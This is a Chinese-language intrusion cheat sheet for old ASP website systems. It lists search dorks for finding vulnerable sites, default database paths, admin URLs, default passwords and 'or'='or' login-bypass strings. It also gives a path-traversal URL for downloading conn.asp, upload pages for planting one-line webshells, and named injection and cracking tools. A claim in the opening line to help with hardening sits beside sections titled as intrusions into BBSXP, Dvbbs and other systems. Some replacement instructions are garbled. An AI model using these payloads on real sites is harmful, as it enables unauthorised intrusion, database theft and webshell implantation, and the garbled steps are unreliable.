先为各位系统梳理一下:许多网站系统在默认配置下,都会存在一些固定的漏洞路径与安全隐患。例如,默认数据库文件往往暴露在明处,后台地址也大同小异,甚至管理员密码就是简单的 'or'='or'。下面按照系统分类,汇总这些常见情况,方便您对照排查与加固。
通用漏洞与默认信息
默认数据库路径:Databases/myszw.mdb、Databases/myszw1.mdb。上传接口:upload_Photo.asp?PhotoUrlID=3、upload_Photo.asp?PhotoUrlID=1。
搜索关键词:网站建设公司企业网站管理系统,后台地址后缀:admin/login.asp。
搜索关键词:网梦购物系统 gCS木马,可在 Google 中检索。
注意:上述名称仅为留言者昵称,不表示任何管理员身份。将 index.asp 替换为 mdb/vcsbook.asp 即可。
搜索关键词:inurl:Went.asp,后台地址后缀:manage/login.asp,密码:'or''=''or'。
搜索关键词:acblog,默认数据库位置:blogdata/acblog.asa。
搜索关键词:Copyright ? 2005-2008??Power,默认数据库:databass/datashop.asp。在网址后添加 linktianjia.asp,提交申请连接并输入一句话代码。或直接访问管理入口,密码:'or'='or'。一句话连接时,在网站后加上 databass/datashop.asp。
搜索关键词:co net mib ver 1.0 design by hypo,搜索网站:https://www.yahoo.cn,密码:'or'='or'。
新云漏洞:将 /flash/downfile.asp?url=uploadfile/../../conn.asp 提交到网站根目录,即可下载 conn.asp 并获取数据库地址。例如,对于 www.123.com,数据库地址为 https://www.123.com/database\xzws.mdb。若数据库名前或中间包含 #,则用 # 替换后仍可下载,如 #xzws.mdb 改为 #xzws.mdb,数据库地址为 https://www.123.com/database\#xzws.mdb,然后下载数据库。
网站猎手 一句话木马。搜索关键词:Powered by BBSXP 7.00,默认数据库后缀:DataBase\BBSXP7.mdb,默认后台:/bbsxp/Login.asp。
搜索关键词:Management Ver 3.0 Build 20030628,后缀:upload.asp。工具:网站猎手、明小子、ASP木马。
密码:'or'='or'。搜索:WEB Manage Ver 1.0、LQT Ver 1.0 Design By wm 6、Web Development By Ver 1.0 Final、Web Management Ver 1.0 Design By Ck8。
常见参数注入点:edit.asp?table=、edit.asp?boardname=、action=、cnunews=、news_main&acode=、asp?id=1、asp?id=2、&idx=、edit.asp?idx=。啊D注入工具,可在百度搜索获取。
搜索:Co Net MIB Ver 1.0网站后台管理系统。
用到工具:挖掘鸡。后缀添加:admin/login.asp。搜索关键词:申请会员有什么好处?,密码:'or'='or'。
啊D注入工具——百度——关键字:admin。
挖掘机关键字:Powered by WEBBOY,页面:/upfile.asp。网站猎手关键字:Powered by mypower,后缀:upfile_photo.asp、upfile_softpic.asp、upfile_adpic.asp。
关键字:Power BY:VenShop V7.01 Copyright:VenShop.Com,密码:'or'='or'。
关键字:powered by mypower,漏洞页面:upfile_photo.asp、Upfile_Soft.asp、upfile_adpic.asp、upfile_softpic.asp。
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成,漏洞页面:upload.asp、upfile_flash.asp。
网上搜索 inurl:manage/login.asp。
关键字:Power BY:VenShop V7.01,后台地址:ad_login.asp,密码:'or'='or'。
关键字:Powered by WEBBOY,后缀:/upfile.asp,工具:明小子上传。
关键词:inurl:asp?=数字、inurl:php?=数字。
关键字:went.asp,后缀:manage/login.asp。
添加后缀 /msmir_net.mdb,搜索:inurl:Msmir_DownLoads。
关键字:Powered By :SMT Version 5.0,后缀:upfile_flash.asp。
关键字:你要入侵的类别 inurl:asp,工具:啊D注入工具。
一、入侵BBSXP系统
用到的工具:网站猎手、数据库小助手、MD5密码破解工具。关键词:广告合作。管理员登陆地址:BBS主页。默认数据库地址:/DATABASE/BBSXP.MDB。
二、入侵动网论坛
用到工具:网站猎手、数据库小助手、MD5密码破解工具。关键词:powered by dvbbs。默认数据库地址:data/dvbbs7.mdb 或 Databackup/dvbbs7.mdb 或 bbs/Databackup/dvbbs7.mdb 或 /bbs/Data/dvbbs7.mdb。管理员登陆地址:BBS主页。默认管理员帐号密码:admin admin888。
三、入侵新云系统
用到的工具:数据库小助手、MD5密码破解工具、挖掘鸡。关键词:本站所提供的程序均来自于 Internet 所以无法保证下载后一定可以安装。管理员登陆地址:/admin/admin_login.asp。默认数据库:database/#newasp.mdb(因为加了#在浏览器无法连接,所以要改成#)。database/#newasp.mdb。默认管理员帐号密码:admin admin。
四、入侵无忧传奇系统
用到的工具:网站猎手、数据库小助手、MD5密码破解工具。关键字:inurl:Msmir_DownLoads。默认数据库地址:/msmir_net.mdb 或 /msmir/msmir.mdb。管理员登陆地址:admin.asp。默认管理员帐号密码:msmir msmir。
